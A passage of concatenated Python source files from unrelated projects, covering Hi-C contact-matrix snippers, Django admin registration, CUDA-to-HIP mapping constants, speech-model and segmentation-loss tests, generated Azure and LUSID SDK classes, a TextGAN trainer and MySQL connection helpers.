# pad_left:pad_right] = matrix[i0:i1, j0:j1].toarray()
else:
snippet = matrix[lo1:hi1, lo2:hi2].toarray().astype('float')
snippet[self._isnan1[lo1:hi1], :] = np.nan
snippet[:, self._isnan2[lo2:hi2]] = np.nan
return snippet
class ObsExpSnipper:
def __init__(self, clr, expected, cooler_opts=None):
self.clr = clr
self.expected = expected
# Detecting the columns for the detection of regions
columns = expected.columns
assert len(columns) > 0
if "chrom" in columns and "start" in columns and "end" in columns:
self.regions_columns = [
"chrom",
"start",
"end",
] # Chromosome arms encoded by multiple columns
elif "chrom" in columns:
self.regions_columns = [
"chrom"
] # Chromosomes or regions encoded in string mode: "chr3:XXXXXXX-YYYYYYYY"
elif "region" in columns:
self.regions_columns = [
"region"
] # Regions encoded in string mode: "chr3:XXXXXXX-YYYYYYYY"
elif len(columns) > 0:
self.regions_columns = columns[
0
] # The first columns is treated as chromosome/region annotation
else:
raise ValueError("Expected dataframe has no columns.")
self.binsize = self.clr.binsize
self.offsets = {}
self.pad = True
self.cooler_opts = {} if cooler_opts is None else cooler_opts
self.cooler_opts.setdefault("sparse", True)
def select(self, region1, region2):
assert region1 == region2, "ObsExpSnipper is implemented for cis contacts only."
self.offsets[region1] = self.clr.offset(region1) - self.clr.offset(region1[0])
self.offsets[region2] = self.clr.offset(region2) - self.clr.offset(region2[0])
matrix = self.clr.matrix(**self.cooler_opts).fetch(region1, region2)
if self.cooler_opts["sparse"]:
matrix = matrix.tocsr()
self._isnan1 = np.isnan(self.clr.bins()["weight"].fetch(region1).values)
self._isnan2 = np.isnan(self.clr.bins()["weight"].fetch(region2).values)
gr = self.expected.groupby(self.regions_columns)
self._expected = LazyToeplitz(
gr.get_group(region1)[
"balanced.avg"
]
.values
)
return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
return np.full((dm, dn), np.nan)
# snippet[pad_bottom:pad_top,
# pad_left:pad_right] = matrix[i0:i1, j0:j1].toarray()
else:
snippet = matrix[lo1:hi1, lo2:hi2].toarray()
snippet[self._isnan1[lo1:hi1], :] = np.nan
snippet[:, self._isnan2[lo2:hi2]] = np.nan
e = self._expected[lo1:hi1, lo2:hi2]
return snippet / e
class ExpectedSnipper:
def __init__(self, clr, expected):
self.clr = clr
self.expected = expected
# Detecting the columns for the detection of regions
columns = expected.columns
assert len(columns) > 0
if "chrom" in columns and "start" in columns and "end" in columns:
self.regions_columns = [
"chrom",
"start",
"end",
] # Chromosome arms encoded by multiple columns
elif "chrom" in columns:
self.regions_columns = [
"chrom"
] # Chromosomes or regions encoded in string mode: "chr3:XXXXXXX-YYYYYYYY"
elif "region" in columns:
self.regions_columns = [
"region"
] # Regions encoded in string mode: "chr3:XXXXXXX-YYYYYYYY"
elif len(columns) > 0:
self.regions_columns = columns[
0
] # The first columns is treated as chromosome/region annotation
else:
raise ValueError("Expected dataframe has no columns.")
try:
for region, group in self.expected.groupby(self.regions_columns):
assert group.shape[0]==np.diff(self.clr.extent(region))[0]
except AssertionError:
raise ValueError("Region shape mismatch between expected and cooler. "
"Are they using the same resolution?")
self.binsize = self.clr.binsize
self.offsets = {}
def select(self, region1, region2):
assert (
region1 == region2
), "ExpectedSnipper is implemented for cis contacts only."
self.offsets[region1] = self.clr.offset(region1) - self.clr.offset(region1[0])
self.offsets[region2] = self.clr.offset(region2) - self.clr.offset(region2[0])
self.m = np.diff(self.clr.extent(region1))
self.n = np.diff(self.clr.extent(region2))
gr = self.expected.groupby(self.regions_columns)
self._expected = LazyToeplitz(
gr.get_group(tuple(region1))[
"balanced.avg"
]
.values
)
return self._expected
def snip(self, exp, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
assert hi1 >= 0
assert hi2 >= 0
dm, dn = hi1 - lo1, hi2 - lo2
if lo1 < 0 or lo2 < 0 or hi1 > self.m or hi2 > self.n:
return np.full((dm, dn), np.nan)
snippet = exp[lo1:hi1, lo2:hi2]
return snippet
|
from django.contrib import admin
from .models import Member,ClusterName,Loan,LoanSchedulePayments,LoanPayment,File
admin.site.register(Member)
admin.site.register(ClusterName)
admin.site.register(Loan)
admin.site.register(LoanSchedulePayments)
admin.site.register(LoanPayment)
admin.site.register(File)
# Register your models here.
|
""" Constants for annotations in the mapping.
The constants defined here are used to annotate the mapping tuples in cuda_to_hip_mappings.py.
They are based on
https://github.com/ROCm-Developer-Tools/HIP/blob/master/hipify-clang/src/Statistics.h
and fall in three categories: 1) type of mapping, 2) API of mapping, 3) unsupported
mapping.
"""
CONV_VERSION = 0,
CONV_INIT = 1
CONV_DEVICE = 2
CONV_MEM = 3
CONV_KERN = 4
CONV_COORD_FUNC = 5
CONV_MATH_FUNC = 6
CONV_DEVICE_FUNC = 7
CONV_SPECIAL_FUNC = 8
CONV_STREAM = 9
CONV_EVENT = 10
CONV_OCCUPANCY = 11
CONV_CONTEXT = 12
CONV_PEER = 13
CONV_MODULE = 14
CONV_CACHE = 15
CONV_EXEC = 16
CONV_ERROR = 17
CONV_DEF = 18
CONV_TEX = 19
CONV_GL = 20
CONV_GRAPHICS = 21
CONV_SURFACE = 22
CONV_JIT = 23
CONV_D3D9 = 24
CONV_D3D10 = 25
CONV_D3D11 = 26
CONV_VDPAU = 27
CONV_EGL = 28
CONV_THREAD = 29
CONV_OTHER = 30
CONV_INCLUDE = 31
CONV_INCLUDE_CUDA_MAIN_H = 32
CONV_TYPE = 33
CONV_LITERAL = 34
CONV_NUMERIC_LITERAL = 35
CONV_LAST = 36
API_DRIVER = 37
API_RUNTIME = 38
API_BLAS = 39
API_SPARSE = 40
API_RAND = 41
API_LAST = 42
API_FFT = 43
API_RTC = 44
API_ROCTX = 45
HIP_UNSUPPORTED = 46
API_PYTORCH = 1337
API_CAFFE2 = 1338
API_C10 = 1339
|
# -*- coding: utf-8 -*-
"""
@date: 2021/7/20 下午10:19
@file: __init__.py.py
@author: zj
@description:
"""
|
import unittest
import torch
import logging
from openspeech.models import ListenAttendSpellWithLocationAwareModel, ListenAttendSpellWithLocationAwareConfigs
from openspeech.tokenizers.ksponspeech.character import KsponSpeechCharacterTokenizer
from openspeech.utils import (
DUMMY_INPUTS,
DUMMY_INPUT_LENGTHS,
DUMMY_TARGETS,
DUMMY_TARGET_LENGTHS,
build_dummy_configs,
)
from openspeech.criterion.label_smoothed_cross_entropy.label_smoothed_cross_entropy import (
LabelSmoothedCrossEntropyLossConfigs,
LabelSmoothedCrossEntropyLoss,
)
logger = logging.getLogger(__name__)
class TestListenAttendSpellWithLocationAware(unittest.TestCase):
def test_forward(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
criterion = LabelSmoothedCrossEntropyLoss(configs, num_classes=len(vocab), vocab=vocab)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-04)
for i in range(3):
outputs = model(DUMMY_INPUTS, DUMMY_INPUT_LENGTHS)
loss = criterion(outputs["logits"], DUMMY_TARGETS[:, 1:])
loss.backward()
optimizer.step()
assert type(loss.item()) == float
def test_beam_search(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
model.set_beam_decoder(beam_size=3)
for i in range(3):
prediction = model(DUMMY_INPUTS, DUMMY_INPUT_LENGTHS)["predictions"]
assert isinstance(prediction, torch.Tensor)
def test_training_step(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
for i in range(3):
outputs = model.training_step(
batch=(DUMMY_INPUTS, DUMMY_TARGETS, DUMMY_INPUT_LENGTHS, DUMMY_TARGET_LENGTHS), batch_idx=i
)
assert type(outputs["loss"].item()) == float
def test_validation_step(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
for i in range(3):
outputs = model.validation_step(
batch=(DUMMY_INPUTS, DUMMY_TARGETS, DUMMY_INPUT_LENGTHS, DUMMY_TARGET_LENGTHS), batch_idx=i
)
assert type(outputs["loss"].item()) == float
def test_test_step(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
for i in range(3):
outputs = model.test_step(
batch=(DUMMY_INPUTS, DUMMY_TARGETS, DUMMY_INPUT_LENGTHS, DUMMY_TARGET_LENGTHS), batch_idx=i
)
assert type(outputs["loss"].item()) == float
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateLinkResourcesOperations:
"""PrivateLinkResourcesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2021_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def list_by_storage_account(
self,
resource_group_name: str,
account_name: str,
**kwargs
) -> "_models.PrivateLinkResourceListResult":
"""Gets the private link resources that need to be created for a storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResourceListResult, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_02_01.models.PrivateLinkResourceListResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResourceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-02-01"
accept = "application/json"
# Construct URL
url = self.list_by_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResourceListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_by_storage_account.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/privateLinkResources'} # type: ignore
|
from django.urls import path
from .views import (Bookmarkarticle,
ListBookmarkedArticles)
app_name = "bookmarks"
urlpatterns = [
path("bookmarks/articles/",
ListBookmarkedArticles.as_view(),
name="view_bookmarked_articles"),
path('articles/<slug>/bookmarks/',
Bookmarkarticle.as_view(), name='bookmark&unbookmark')
]
|
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.4425
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class ResourceListOfGetCreditSupportAnnexResponse(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'values': 'list[GetCreditSupportAnnexResponse]',
'href': 'str',
'links': 'list[Link]',
'next_page': 'str',
'previous_page': 'str'
}
attribute_map = {
'values': 'values',
'href': 'href',
'links': 'links',
'next_page': 'nextPage',
'previous_page': 'previousPage'
}
required_map = {
'values': 'required',
'href': 'optional',
'links': 'optional',
'next_page': 'optional',
'previous_page': 'optional'
}
def __init__(self, values=None, href=None, links=None, next_page=None, previous_page=None, local_vars_configuration=None): # noqa: E501
"""ResourceListOfGetCreditSupportAnnexResponse - a model defined in OpenAPI"
:param values: The resources to list. (required)
:type values: list[lusid.GetCreditSupportAnnexResponse]
:param href: The URI of the resource list.
:type href: str
:param links: Collection of links.
:type links: list[lusid.Link]
:param next_page: The next page of results.
:type next_page: str
:param previous_page: The previous page of results.
:type previous_page: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._values = None
self._href = None
self._links = None
self._next_page = None
self._previous_page = None
self.discriminator = None
self.values = values
self.href = href
self.links = links
self.next_page = next_page
self.previous_page = previous_page
@property
def values(self):
"""Gets the values of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
The resources to list. # noqa: E501
:return: The values of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: list[lusid.GetCreditSupportAnnexResponse]
"""
return self._values
@values.setter
def values(self, values):
"""Sets the values of this ResourceListOfGetCreditSupportAnnexResponse.
The resources to list. # noqa: E501
:param values: The values of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type values: list[lusid.GetCreditSupportAnnexResponse]
"""
if self.local_vars_configuration.client_side_validation and values is None: # noqa: E501
raise ValueError("Invalid value for `values`, must not be `None`") # noqa: E501
self._values = values
@property
def href(self):
"""Gets the href of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
The URI of the resource list. # noqa: E501
:return: The href of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: str
"""
return self._href
@href.setter
def href(self, href):
"""Sets the href of this ResourceListOfGetCreditSupportAnnexResponse.
The URI of the resource list. # noqa: E501
:param href: The href of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type href: str
"""
self._href = href
@property
def links(self):
"""Gets the links of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
Collection of links. # noqa: E501
:return: The links of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: list[lusid.Link]
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this ResourceListOfGetCreditSupportAnnexResponse.
Collection of links. # noqa: E501
:param links: The links of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type links: list[lusid.Link]
"""
self._links = links
@property
def next_page(self):
"""Gets the next_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
The next page of results. # noqa: E501
:return: The next_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: str
"""
return self._next_page
@next_page.setter
def next_page(self, next_page):
"""Sets the next_page of this ResourceListOfGetCreditSupportAnnexResponse.
The next page of results. # noqa: E501
:param next_page: The next_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type next_page: str
"""
self._next_page = next_page
@property
def previous_page(self):
"""Gets the previous_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
The previous page of results. # noqa: E501
:return: The previous_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: str
"""
return self._previous_page
@previous_page.setter
def previous_page(self, previous_page):
"""Sets the previous_page of this ResourceListOfGetCreditSupportAnnexResponse.
The previous page of results. # noqa: E501
:param previous_page: The previous_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type previous_page: str
"""
self._previous_page = previous_page
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResourceListOfGetCreditSupportAnnexResponse):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ResourceListOfGetCreditSupportAnnexResponse):
return True
return self.to_dict() != other.to_dict()
|
# -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : instructor.py
# @Time : Created at 2019-04-25
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
import torch
import torch.nn as nn
import config as cfg
from utils.data_loader import GenDataIter
from utils.helpers import Signal, create_logger
from utils.text_process import load_dict, write_tokens, tensor_to_tokens
class BasicInstructor:
def __init__(self, opt):
self.log = create_logger(__name__, silent=False, to_disk=True,
log_file=cfg.log_filename if cfg.if_test
else [cfg.log_filename, cfg.save_root + 'log.txt'])
self.sig = Signal(cfg.signal_file)
self.opt = opt
self.show_config()
# load dictionary
self.word_index_dict, self.index_word_dict = load_dict(cfg.dataset)
# Dataloader
self.train_data = GenDataIter(cfg.train_data)
self.test_data = GenDataIter(cfg.test_data, if_test_data=True)
self.gen_data = None
# Criterion
self.mle_criterion = nn.NLLLoss()
self.dis_criterion = None
self.bleu = None
self.self_bleu = None
def _run(self):
print('Nothing to run in Basic Instructor!')
pass
def _test(self):
pass
def init_model(self):
if cfg.dis_pretrain:
self.log.info(
'Load pretrain_generator discriminator: {}'.format(cfg.pretrained_dis_path))
self.dis.load_state_dict(torch.load(cfg.pretrained_dis_path))
if cfg.gen_pretrain:
self.log.info('Load MLE pretrain_generator gen: {}'.format(cfg.pretrained_gen_path))
self.gen.load_state_dict(torch.load(cfg.pretrained_gen_path))
if cfg.CUDA:
self.gen = self.gen.cuda()
self.dis = self.dis.cuda()
def train_gen_epoch(self, model, data_loader, criterion, optimizer):
total_loss = 0
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
hidden = model.init_hidden(data_loader.batch_size)
pred = model.forward(inp, hidden)
loss = criterion(pred, target.view(-1))
self.optimize(optimizer, loss, model)
total_loss += loss.item()
return total_loss / len(data_loader)
def train_dis_epoch(self, model, data_loader, criterion, optimizer):
total_loss = 0
total_acc = 0
total_num = 0
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
pred = model.forward(inp)
loss = criterion(pred, target)
self.optimize(optimizer, loss, model)
total_loss += loss.item()
total_acc += torch.sum((pred.argmax(dim=-1) == target)).item()
total_num += inp.size(0)
total_loss /= len(data_loader)
total_acc /= total_num
return total_loss, total_acc
@staticmethod
def eval_gen(model, data_loader, criterion):
total_loss = 0
with torch.no_grad():
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
hidden = model.init_hidden(data_loader.batch_size)
pred = model.forward(inp, hidden)
loss = criterion(pred, target.view(-1))
total_loss += loss.item()
return total_loss / len(data_loader)
@staticmethod
def eval_dis(model, data_loader, criterion):
total_loss = 0
total_acc = 0
total_num = 0
with torch.no_grad():
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
pred = model.forward(inp)
loss = criterion(pred, target)
total_loss += loss.item()
total_acc += torch.sum((pred.argmax(dim=-1) == target)).item()
total_num += inp.size(0)
total_loss /= len(data_loader)
total_acc /= total_num
return total_loss, total_acc
@staticmethod
def optimize_multi(opts, losses):
for i, (opt, loss) in enumerate(zip(opts, losses)):
opt.zero_grad()
loss.backward(retain_graph=True if i < len(opts) - 1 else False)
opt.step()
@staticmethod
def optimize(opt, loss, model=None, retain_graph=False):
opt.zero_grad()
loss.backward(retain_graph=retain_graph)
if model is not None:
torch.nn.utils.clip_grad_norm_(model.parameters(), cfg.clip_norm)
opt.step()
def show_config(self):
self.log.info(100 * '=')
self.log.info('> training arguments:')
for arg in vars(self.opt):
self.log.info('>>> {0}: {1}'.format(arg, getattr(self.opt, arg)))
self.log.info(100 * '=')
def cal_metrics(self, fmt_str=False):
"""
Calculate metrics
:param fmt_str: if return format string for logging
"""
eval_samples = self.gen.sample(cfg.samples_num, 4 * cfg.batch_size)
self.gen_data.reset(eval_samples)
new_gen_tokens = tensor_to_tokens(eval_samples, self.index_word_dict)
self.bleu.test_text = new_gen_tokens
self.self_bleu.real_text = new_gen_tokens
self.self_bleu.test_text = tensor_to_tokens(self.gen.sample(200, 200), self.index_word_dict)
# BLEU-[2,3,4,5]
bleu_score = self.bleu.get_score(ignore=False)
# Self-BLEU
self_bleu_score = self.self_bleu.get_score(ignore=False)
# NLL_gen
gen_nll = self.eval_gen(self.gen,
self.train_data.loader,
self.mle_criterion)
if fmt_str:
return 'BLEU-%s = %s, gen_NLL = %.4f, self_bleu = %s,' % (
self.bleu.gram, bleu_score, gen_nll, self_bleu_score)
return bleu_score, gen_nll, self_bleu_score
def _save(self, phrase, epoch):
"""Save model state dict and generator's samples"""
torch.save(self.gen.state_dict(), cfg.save_model_root + 'gen_{}_{:05d}.pt'.format(phrase, epoch))
save_sample_path = cfg.save_samples_root + 'samples_{}_{:05d}.txt'.format(phrase, epoch)
samples = self.gen.sample(cfg.batch_size, cfg.batch_size)
write_tokens(save_sample_path, tensor_to_tokens(samples, self.index_word_dict))
|
"""Mysql wrappers to execute mysql statements.
The default behaviour depends on the configuration module which contains the
database settings to use.
"""
from contextlib import contextmanager
from functools import wraps
import logging
import MySQLdb
from helot_common import configuration
@contextmanager
def db_connection(host=None, user=None, passwd=None, db=None,
connect_to_db=True):
"""Auto closing db connection context manager.
Yields an active db connection which will be closed automatically.
:parameter connect_to_db: (boolean) True to connect to the database.
Otherwise it will no connect to a specific database, something that can be
useful in the case of a database creation.
"""
params = {
'host': host or configuration.mysql.host,
'user': user or configuration.mysql.user,
'passwd': passwd or configuration.mysql.passwd
}
if connect_to_db:
params['db'] = db or configuration.mysql.db
db_conn = MySQLdb.connect(**params)
yield db_conn
db_conn.close()
@contextmanager
def db_cursor(db_conn):
"""Auto closing db cursor context manager.
Yields an live db cursor which will be closed automatically.
:parameter db_conn: The db connection to use for the creation of the cursor.
"""
cur = db_conn.cursor()
yield cur
cur.close()
@contextmanager
def make_query_executor(*args, **kwargs):
"""Context manager providing a function to execute sql queries.
Yields a query executor function.
"""
with db_connection(*args, **kwargs) as db_conn, db_cursor(db_conn) as cur:
def execute_query(sql):
cur.execute(sql)
col_names = [col_data[0] for col_data in cur.description]
for row in cur.fetchall():
row_data = _RawData()
for i, cell in enumerate(row):
setattr(row_data, col_names[i], cell)
yield row_data
yield execute_query
@contextmanager
def make_non_query_executor(*args, **kwargs):
"""Context manager providing a function to execute non query statements.
Yields a non query executor function.
:parameter use_db: (boolean) True to connect to the database. Otherwise it
will no connect to a specific database, something that can be useful in the
case of a database creation.
"""
with db_connection(*args, **kwargs) as db_conn, db_cursor(db_conn) as cur:
def execute_non_query(sql):
try:
cur.execute(sql)
db_conn.commit()
except Exception as ex:
logging.exception(ex)
db_conn.rollback()
yield execute_non_query
class _RawData(object):
"""Used to create the object to encapsulate the data of retrieved row."""
def query_executor_user(function_to_decorate):
"""Decorates a function adding an execute query function argument.
When decorates a function its signature must contain an argument called
execute_query which will receive a sql executor to use for queries.
:parameter function_to_decorate: The function to decorate.
:returns : The decorated function containing the execute_query argument.
"""
@wraps(function_to_decorate)
def decorator(*args, **kargs):
with make_query_executor() as execute_query:
kargs['execute_query'] = execute_query
return function_to_decorate(*args, **kargs)
return decorator
def execute_query(sql, **kwargs):
"""Simplest way to execute a query.
Opens and closes a new connection and cursor every time called.
:param sql: (str) The sql statement to execute.
:param kwargs: The connection settings.
Yields a sequence of rows coming from the execution of the query.
"""
with make_query_executor(**kwargs) as executor:
for row in executor(sql):
yield row
|
import pytest
import torch
import segmentation_models_pytorch as smp
import segmentation_models_pytorch.losses._functional as F
from segmentation_models_pytorch.losses import (
DiceLoss,
JaccardLoss,
SoftBCEWithLogitsLoss,
SoftCrossEntropyLoss,
TverskyLoss,
)
def test_focal_loss_with_logits():
input_good = torch.tensor([10, -10, 10]).float()
input_bad = torch.tensor([-1, 2, 0]).float()
target = torch.tensor([1, 0, 1])
loss_good = F.focal_loss_with_logits(input_good, target)
loss_bad = F.focal_loss_with_logits(input_bad, target)
assert loss_good < loss_bad
def test_softmax_focal_loss_with_logits():
input_good = torch.tensor([[0, 10, 0], [10, 0, 0], [0, 0, 10]]).float()
input_bad = torch.tensor([[0, -10, 0], [0, 10, 0], [0, 0, 10]]).float()
target = torch.tensor([1, 0, 2]).long()
loss_good = F.softmax_focal_loss_with_logits(input_good, target)
loss_bad = F.softmax_focal_loss_with_logits(input_bad, target)
assert loss_good < loss_bad
@pytest.mark.parametrize(
["y_true", "y_pred", "expected", "eps"],
[
[[1, 1, 1, 1], [1, 1, 1, 1], 1.0, 1e-5],
[[0, 1, 1, 0], [0, 1, 1, 0], 1.0, 1e-5],
[[1, 1, 1, 1], [1, 1, 0, 0], 0.5, 1e-5],
],
)
def test_soft_jaccard_score(y_true, y_pred, expected, eps):
y_true = torch.tensor(y_true, dtype=torch.float32)
y_pred = torch.tensor(y_pred, dtype=torch.float32)
actual = F.soft_jaccard_score(y_pred, y_true, eps=eps)
assert float(actual) == pytest.approx(expected, eps)
@pytest.mark.parametrize(
["y_true", "y_pred", "expected", "eps"],
[
[[[1, 1, 0, 0], [0, 0, 1, 1]], [[1, 1, 0, 0], [0, 0, 1, 1]], 1.0, 1e-5],
[[[1, 1, 0, 0], [0, 0, 1, 1]], [[0, 0, 1, 0], [0, 1, 0, 0]], 0.0, 1e-5],
[[[1, 1, 0, 0], [0, 0, 0, 1]], [[1, 1, 0, 0], [0, 0, 0, 0]], 0.5, 1e-5],
],
)
def test_soft_jaccard_score_2(y_true, y_pred, expected, eps):
y_true = torch.tensor(y_true, dtype=torch.float32)
y_pred = torch.tensor(y_pred, dtype=torch.float32)
actual = F.soft_jaccard_score(y_pred, y_true, dims=[1], eps=eps)
actual = actual.mean()
assert float(actual) == pytest.approx(expected, eps)
@pytest.mark.parametrize(
["y_true", "y_pred", "expected", "eps"],
[
[[1, 1, 1, 1], [1, 1, 1, 1], 1.0, 1e-5],
[[0, 1, 1, 0], [0, 1, 1, 0], 1.0, 1e-5],
[[1, 1, 1, 1], [1, 1, 0, 0], 2.0 / 3.0, 1e-5],
],
)
def test_soft_dice_score(y_true, y_pred, expected, eps):
y_true = torch.tensor(y_true, dtype=torch.float32)
